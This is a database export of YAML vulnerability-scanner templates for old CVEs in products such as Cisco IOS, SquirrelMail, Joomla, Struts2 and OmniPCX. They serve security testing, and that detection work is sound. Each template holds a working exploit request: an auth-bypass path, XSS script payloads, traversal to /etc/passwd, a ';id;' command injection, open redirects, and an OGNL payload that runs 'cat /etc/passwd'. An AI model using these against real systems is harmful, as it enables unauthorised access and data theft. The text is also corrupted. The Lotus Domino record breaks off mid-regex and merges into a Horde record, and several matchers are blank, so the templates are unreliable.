"_id": { "$oid": "66477a413521042ccf307e36" }, "name": "CVE-2001-0537.yaml", "content": "id: CVE-2001-0537\n\ninfo:\n name: Cisco IOS HTTP Configuration - Authentication Bypass\n author: DhiyaneshDK\n severity: critical\n description: |\n HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to the affected device.\n remediation: |\n Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software.\n reference:\n - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/\n - https://nvd.nist.gov/vuln/detail/CVE-2001-0537\n - http://www.ciac.org/ciac/bulletins/l-106.shtml\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C\n cvss-score: 9.3\n cve-id: CVE-2001-0537\n cwe-id: CWE-287\n epss-score: 0.87683\n epss-percentile: 0.98569\n cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cisco\n product: ios\n shodan-query: product:\"Cisco IOS http config\" && 200\n tags: cve,cve2001,cisco,ios,auth-bypass\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/level/16/exec/show/config/CR'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'service config'\n - 'Switch'\n - 'default-gateway'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950", "hash": "1c93b2a65d7c03cd6e020d052f54fb74", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e37" }, "name": "CVE-2002-1131.yaml", "content": "id: CVE-2002-1131\n\ninfo:\n name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: high\n description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - http://www.redhat.com/support/errata/RHSA-2002-204.html\n - http://www.debian.org/security/2002/dsa-191\n - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774\n - https://www.exploit-db.com/exploits/21811\n - https://nvd.nist.gov/vuln/detail/CVE-2002-1131\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2002-1131\n cwe-id: CWE-80\n epss-score: 0.06018\n epss-percentile: 0.92781\n cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*\n metadata:\n max-request: 5\n vendor: squirrelmail\n product: squirrelmail\n tags: cve,cve2002,edb,xss,squirrelmail\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n - '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n - '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'\n - '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'\n - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200f73612464ffbb40fb37890f6902c59fd670a8c57eb10a297b6ce6d7d7a68301022100a8ed74ff2523575fbbdb8d5a4a330d69c6a96ef8d97d911a20c1468dfa92aa2e:922c64590222798bb761d5b6d8e72950", "hash": "1c21a7c8d038bac341aae77547addc3e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e38" }, "name": "CVE-2004-0519.yaml", "content": "id: CVE-2004-0519\n\ninfo:\n name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface.\n remediation: Upgrade to the latest version.\n reference:\n - https://www.exploit-db.com/exploits/24068\n - http://security.gentoo.org/glsa/glsa-200405-16.xml\n - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc\n - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858\n - http://marc.info/?l=bugtraq&m=108334862800260\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2004-0519\n cwe-id: NVD-CWE-Other\n epss-score: 0.02285\n epss-percentile: 0.89406\n cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sgi\n product: propack\n tags: cve,cve2004,squirrelmail,edb,xss,sgi\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009dd2f6f1f47f6884512787786f2340268b3b43d1f115d5b41a670c3f29f42c4d022100dd3b55ba93d169763824f63a0016a520e29f80044dd7087a2d1122f4b3617c19:922c64590222798bb761d5b6d8e72950", "hash": "3ce5e009ca0307a4fb76ea128dc60006", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e39" }, "name": "CVE-2004-1965.yaml", "content": "id: CVE-2004-1965\n\ninfo:\n name: Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS\n author: ctflearner\n severity: medium\n description: |\n Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.\n impact: |\n Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft.\n remediation: |\n Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities.\n reference:\n - https://www.exploit-db.com/exploits/24055\n - https://nvd.nist.gov/vuln/detail/CVE-2004-1965\n - http://marc.info/?l=bugtraq&m=108301983206107&w=2\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2004-1965\n cwe-id: NVD-CWE-Other\n epss-score: 0.0113\n epss-percentile: 0.84351\n cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: openbb\n product: openbb\n tags: cve,cve2004,redirect,xss,openbb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950", "hash": "62f265d7498fd425287846bd2df715a2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3a" }, "name": "CVE-2005-2428.yaml", "content": "id: CVE-2005-2428\n\ninfo:\n name: Lotus Domino R5 and R6 WebMail - Information Disclosure\n author: CasperGN\n severity: medium\n description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).\n impact: |\n The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security.\n remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.\n reference:\n - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf\n - https://www.exploit-db.com/exploits/39495\n - https://nvd.nist.gov/vuln/detail/CVE-2005-2428\n - http://marc.info/?l=bugtraq&m=112240869130356&w=2\n - http://securitytracker.com/id?1014584\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2005-2428\n cwe-id: CWE-200\n epss-score: 0.01188\n epss-percentile: 0.83623\n cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ibm\n product: lotus_domino\n tags: cve2005,cve,domino,edb,ibm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/names.nsf/People?OpenView\"\n\n matchers-condition: and\n matchers:\n - type: regex\n name: domino-username\n part: body\n regex:\n - '(Horde :: User Administration\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950", "hash": "362cd755a3cd20ca5992e52189b4c65c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3c" }, "name": "CVE-2005-3634.yaml", "content": "id: CVE-2005-3634\n\ninfo:\n name: SAP Web Application Server 6.x/7.0 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/26488\n - https://cxsecurity.com/issue/WLB-2005110025\n - https://marc.info/?l=bugtraq&m=113156525006667&w=2\n - http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_Multiple_XSS_in_SAP_WAS.pdf\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/23031\n - https://nvd.nist.gov/vuln/detail/CVE-2005-3634\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N\n cvss-score: 5\n cve-id: CVE-2005-3634\n cwe-id: NVD-CWE-Other\n epss-score: 0.02843\n epss-percentile: 0.897\n cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: sap_web_application_server\n shodan-query: html:\"SAP Business Server Pages Team\"\n tags: cve,cve2005,sap,redirect,business,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4b0a004830460221009b702e9a18c644f2a8ddd637cd2d87e35e59ec9159e4726e5b9dbf6cbe27ddcc022100e7fd499cc594ceab440e9188af24fd6eaa6f1eab4514609586796ae41b96b43f:922c64590222798bb761d5b6d8e72950", "hash": "8443892e8813df23568e2b56db924001", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3d" }, "name": "CVE-2005-4385.yaml", "content": "id: CVE-2005-4385\n\ninfo:\n name: Cofax <=2.0RC3 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor.\n reference:\n - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html\n - https://nvd.nist.gov/vuln/detail/CVE-2005-4385\n - http://www.vupen.com/english/advisories/2005/2977\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2005-4385\n cwe-id: NVD-CWE-Other\n epss-score: 0.00294\n epss-percentile: 0.68633\n cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cofax\n product: cofax\n tags: cve2005,cve,cofax,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\\\"\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ce759080f0a66542cb9e9ef838c4eec1bfc1ff9f685db0a5e1b5288ec69daa6202210098c3b44c36f631ea8314785ec5f8b01f320897dbb8fbfe5549601f5dfa1cfaaf:922c64590222798bb761d5b6d8e72950", "hash": "0d5342deb78fe5d5f4ec1dbf8371beab", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3e" }, "name": "CVE-2006-1681.yaml", "content": "id: CVE-2006-1681\n\ninfo:\n name: Cherokee HTTPD <=0.5 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - http://www.vupen.com/english/advisories/2006/1292\n - https://nvd.nist.gov/vuln/detail/CVE-2006-1681\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/25698\n - https://security.gentoo.org/glsa/202012-09\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2006-1681\n cwe-id: NVD-CWE-Other\n epss-score: 0.01015\n epss-percentile: 0.82067\n cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cherokee\n product: cherokee_httpd\n tags: cve,cve2006,cherokee,httpd,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206000675250836d41143110814a2779c38b107e4a265562dd0b63d3cbbd788faf02207e8b57e4d85550b1daf5c2e4a1d4640d9347d24ba23c9e16b1bb2a75c722089e:922c64590222798bb761d5b6d8e72950", "hash": "99d18576ff2cf915555e5fb196b237a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3f" }, "name": "CVE-2006-2842.yaml", "content": "id: CVE-2006-2842\n\ninfo:\n name: Squirrelmail <=1.4.6 - Local File Inclusion\n author: dhiyaneshDk\n severity: high\n description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/27948\n - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE\n - http://www.squirrelmail.org/security/issue/2006-06-01\n - https://nvd.nist.gov/vuln/detail/CVE-2006-2842\n - ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2006-2842\n cwe-id: CWE-22\n epss-score: 0.25691\n epss-percentile: 0.9628\n cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: squirrelmail\n product: squirrelmail\n tags: cve,cve2006,lfi,squirrelmail,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204e83bd6e716c336c1660d900f8c08653ace9865180909e88dc35b6180af0634d02205959ac5c89fa3aa04db1f64a614848f8a84c0604fe7f72bad1f63b1c99d8404b:922c64590222798bb761d5b6d8e72950", "hash": "1e9d62593827e580a90d6472ddcfea6a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e40" }, "name": "CVE-2007-0885.yaml", "content": "id: CVE-2007-0885\n\ninfo:\n name: Jira Rainbow.Zen - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Jira Rainbow.Zen to mitigate the Cross-Site Scripting vulnerability.\n reference:\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418\n - https://nvd.nist.gov/vuln/detail/CVE-2007-0885\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2007-0885\n cwe-id: NVD-CWE-Other\n epss-score: 0.0093\n epss-percentile: 0.82626\n cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rainbow_portal\n product: rainbow.zen\n tags: cve,cve2007,jira,xss,rainbow_portal\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ed59822b672884f4e50ef40df983fb0862418cede91f6dc96f764425e4bf4e302205b376b90e98b64ced2421151d9636a14d0dd0830c2dee682c77cda12c602e7f1:922c64590222798bb761d5b6d8e72950", "hash": "002a7bac89e42f4332b45ad733f8ff8a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e41" }, "name": "CVE-2007-3010.yaml", "content": "id: CVE-2007-3010\n\ninfo:\n name: Alcatel-Lucent OmniPCX - Remote Command Execution\n author: king-alexander\n severity: critical\n description: |\n The OmniPCX web interface has a script \"masterCGI\" with a remote command execution vulnerability via the \"user\" parameter.\n impact: |\n Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.\n remediation: |\n Update to supported versions that filter shell metacharacters in the \"user\" parameter.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2007-3010\n - https://marc.info/?l=full-disclosure&m=119002152126755&w=2\n - http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php\n - http://www.vupen.com/english/advisories/2007/3185\n - http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2007-3010\n cwe-id: CWE-20\n epss-score: 0.97317\n epss-percentile: 0.99868\n cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: alcatel-lucent\n product: omnipcx\n shodan-query: title:\"OmniPCX for Enterprise\"\n fofa-query: app=\"Alcatel_Lucent-OmniPCX-Enterprise\"\n tags: cve,cve2007,kev,rce,alcatel\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"uid=[0-9]+.*gid=[0-9]+.*\"\n\n - type: word\n part: body\n words:\n - \"master\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950", "hash": "7692b4ea20a13b77e3a6bcc46a88d01e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e42" }, "name": "CVE-2007-4504.yaml", "content": "id: CVE-2007-4504\n\ninfo:\n name: Joomla! RSfiles <=1.0.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/4307\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222\n - https://nvd.nist.gov/vuln/detail/CVE-2007-4504\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2007-4504\n cwe-id: CWE-22\n epss-score: 0.02599\n epss-percentile: 0.90043\n cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: rsfiles\n tags: cve2007,cve,lfi,edb,joomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207688a03699896a3d8c9a6254539a13ace8813096112296d102ca74fc45a0f17b022036a518c6e517befe270990e5d1a9d992f8b19f1fa36086546a11b544ff84c692:922c64590222798bb761d5b6d8e72950", "hash": "a60caf4b57fa7b616fa70c98d5ea5cbc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e43" }, "name": "CVE-2007-4556.yaml", "content": "id: CVE-2007-4556\n\ninfo:\n name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution\n author: pikpikcu\n severity: medium\n description: |\n Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for\"m input beginning with a \"%{\" sequence and ending with a \"}\" character.\n impact: |\n Remote code execution\n remediation: |\n Update to the latest version of Apache Struts2\n reference:\n - https://www.guildhab.top/?p=2326\n - https://nvd.nist.gov/vuln/detail/CVE-2007-4556\n - https://cwiki.apache.org/confluence/display/WW/S2-001\n - http://forums.opensymphony.com/ann.jspa?annID=54\n - http://issues.apache.org/struts/browse/WW-2030\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2007-4556\n cwe-id: NVD-CWE-Other\n epss-score: 0.16469\n epss-percentile: 0.95873\n cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: opensymphony\n product: xwork\n tags: cve,cve2007,apache,rce,struts,opensymphony\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/login.action\"\n\n body: |\n username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022037e628251b17abd8fa644b564dab5c21ed475158752e510f311df96b9d63497402201bb1673e45a11edc53bdf0a83147c1a87a74c36358ede8fe0f576850c4d4900b:922c64590222798bb761d5b6d8e72950", "hash": "fc7f520acf098ea346336c7193876fa9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e44" }, "name": "CVE-2007-5728.yaml", "content": "id: CVE-2007-5728\n\ninfo:\n name: phpPgAdmin <=4.1.1 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/30090\n - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html\n - https://nvd.nist.gov/vuln/detail/CVE-2007-5728\n - http://www.debian.org/security/2008/dsa-1693\n - http://www.novell.com/linux/security/advisories/2007_24_sr.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2007-5728\n cwe-id: CWE-79\n epss-score: 0.02361\n epss-percentile: 0.88734\n cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phppgadmin\n product: phppgadmin\n shodan-query: http.title:\"phpPgAdmin\"\n tags: cve2007,cve,xss,pgadmin,phppgadmin,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n - 'phpPgAdmin'\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 